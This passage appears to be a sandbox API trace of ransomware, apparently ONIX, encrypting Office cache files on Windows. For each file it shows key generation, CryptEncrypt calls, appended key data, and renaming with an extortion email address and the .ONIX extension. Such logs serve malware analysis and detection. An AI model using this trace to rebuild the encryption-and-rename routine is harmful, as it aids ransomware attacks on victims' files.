(lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74 [0104.978] GetProcessHeap () returned 0x410000 [0104.978] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x104) returned 0x467908 [0104.978] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" [0104.978] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.978] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=7378792) returned 1 [0104.978] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x709768 [0104.978] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.978] GetProcessHeap () returned 0x410000 [0104.978] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.978] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.981] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.982] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.983] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.984] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x709768) returned 0x3680020 [0104.985] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x709768) returned 0x3d90020 [0104.985] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.985] ReadFile (in: hFile=0x490, lpBuffer=0x3680020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x709768, lpOverlapped=0x0) returned 1 [0105.629] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x709768, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0105.629] CloseHandle (hObject=0x490) returned 1 [0105.630] GetProcessHeap () returned 0x410000 [0105.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0105.630] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0105.632] GetProcessHeap () returned 0x410000 [0105.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0105.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0105.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0105.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0105.632] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0105.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0105.632] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0105.632] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0105.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0105.632] GetLastError () returned 0x0 [0105.632] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0105.633] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0105.633] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x228df5c, nNumberOfBytesToLockHigh=0x0) returned 1 [0105.633] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.633] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0105.635] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.635] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0105.635] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0105.635] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0105.635] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1 [0105.636] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76 [0105.636] GetProcessHeap () returned 0x410000 [0105.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0105.636] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0105.636] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0105.636] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=36233052) returned 1 [0105.636] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x228df5c [0105.636] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0105.636] GetProcessHeap () returned 0x410000 [0105.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0105.636] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0105.636] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0105.639] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0105.640] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0105.641] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x228df5c) returned 0x3680020 [0105.642] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x228df5c) returned 0x5910020 [0105.643] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.643] ReadFile (in: hFile=0x490, lpBuffer=0x3680020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x228df5c, lpOverlapped=0x0) returned 1 [0107.683] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x228df5c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.683] CloseHandle (hObject=0x490) returned 1 [0107.684] GetProcessHeap () returned 0x410000 [0107.684] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0107.684] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0107.687] GetProcessHeap () returned 0x410000 [0107.687] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0107.687] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0107.687] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0107.687] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0107.687] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0107.687] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0107.687] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0107.687] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0107.687] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0107.687] GetLastError () returned 0x0 [0107.687] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0107.687] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0107.688] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x165510, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.688] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.688] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0107.689] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.690] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0107.690] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0107.690] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0107.690] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1 [0107.690] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75 [0107.690] GetProcessHeap () returned 0x410000 [0107.690] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0107.690] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0107.690] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0107.690] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1463568) returned 1 [0107.690] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x165510 [0107.690] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0107.690] GetProcessHeap () returned 0x410000 [0107.690] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0107.690] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0107.691] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0107.692] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0107.693] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0107.694] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x165510) returned 0x2b30020 [0107.695] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x165510) returned 0x3680020 [0107.695] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.695] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x165510, lpOverlapped=0x0) returned 1 [0107.766] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x165510, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.766] CloseHandle (hObject=0x490) returned 1 [0107.766] GetProcessHeap () returned 0x410000 [0107.766] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0107.766] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0107.768] GetProcessHeap () returned 0x410000 [0107.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0107.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0107.768] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0107.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0107.769] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0107.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0107.769] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0107.769] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0107.769] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0107.769] GetLastError () returned 0x0 [0107.769] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0107.769] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0107.769] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xaec3a, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.769] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.769] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0107.771] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.771] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0107.771] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0107.771] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0107.771] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1 [0107.771] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88 [0107.771] GetProcessHeap () returned 0x410000 [0107.771] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x449878 [0107.771] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0107.771] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0107.771] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=715834) returned 1 [0107.771] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xaec3a [0107.771] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0107.772] GetProcessHeap () returned 0x410000 [0107.772] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0107.772] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0107.772] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0107.776] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0107.777] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0107.778] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaec3a) returned 0x2680020 [0107.778] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaec3a) returned 0x2b30020 [0107.778] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.778] ReadFile (in: hFile=0x490, lpBuffer=0x2680020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, 